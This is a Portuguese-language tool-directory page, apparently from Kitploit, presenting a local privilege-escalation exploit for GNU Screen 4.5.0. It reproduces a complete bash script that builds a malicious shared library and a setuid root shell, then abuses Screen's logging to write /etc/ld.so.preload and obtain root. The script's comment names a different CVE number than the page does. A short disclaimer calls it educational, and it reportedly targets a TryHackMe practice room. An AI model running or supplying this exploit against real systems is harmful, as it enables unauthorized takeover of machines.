Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-5618-Screen-4.5.0-Root — Exploit de escalonamento local de privilégio para GNU Screen 4.5.0 (CVE-2017-5618). Explora uma vulnerabilidade no recurso de registro para sequestrar o carregamento de bibliotecas compartilhadas e obter acesso root via manipulação de ld.so.preload. Vulnerável: Screen 4.5.0 (SUID) Corrigido em: Screen 4.6.0+ | Kitploit
Ferramentas/GitHubGitHub/rxdarkee/cve-2017-5618-screen-4.5.0-root
Escalada de PrivilégiosExploraçãoTestes de PenetraçãoAprendizado e EducaçãoExploração de BináriosLabs e Prática
GitHubrxdarkee/cve-2017-5618-screen-4.5.0-root

CVE-2017-5618-Screen-4.5.0-Root

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Exploit de escalonamento local de privilégio para GNU Screen 4.5.0 (CVE-2017-5618). Explora uma vulnerabilidade no recurso de registro para sequestrar o carregamento de bibliotecas compartilhadas e obter acesso root via manipulação de ld.so.preload. Vulnerável: Screen 4.5.0 (SUID) Corrigido em: Screen 4.6.0+

32há 11 mesesAinda não revisado
Compartilhar

GNU Screen 4.5.0 Exploração de Escalação de Privilégio Local (CVE-2017-5618)

📌 Visão Geral

Exploração de escalação de privilégio local para o GNU Screen 4.5.0 que sequestra o carregamento de bibliotecas compartilhadas para obter acesso root através da manipulação do ld.so.preload.

🔧 Detalhes Técnicos

Vulnerabilidade: CVE-2017-5618

Tipo: Sequestro de Biblioteca Compartilhada via ld.so.preload

Afetado: Exclusivamente GNU Screen 4.5.0

Corrigido em: GNU Screen 4.6.0+

🎪 O Circo da Vulnerabilidade

CVE: 2017-5618 🎯

O Bug: O Screen 4.5.0 cria arquivos de log com permissões PERIGOSAS

A Mágica: Nós o enganamos para criar /etc/ld.so.preload que carrega nossa biblioteca maliciosa

O Payload: Shell root instantâneo! 🐚

Script 🗒️

root@kitploit:~
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            

Capturas de Tela

Verificando a versão vulnerável do Screen.

Versão do Screen detectada

Criando o arquivo e dando as permissões necessárias.

Criando

Acesso root obtido.

Root

Shell root alcançado - controle total do sistema

⚠️ Aviso

APENAS PARA USO EDUCACIONAL! ⚠️ Não seja um script kiddie - use isso apenas em sistemas que você possui ou tem permissão explícita para testar.

Testado Em

TryHackMe KOTH Room - Food

Baixar ferramenta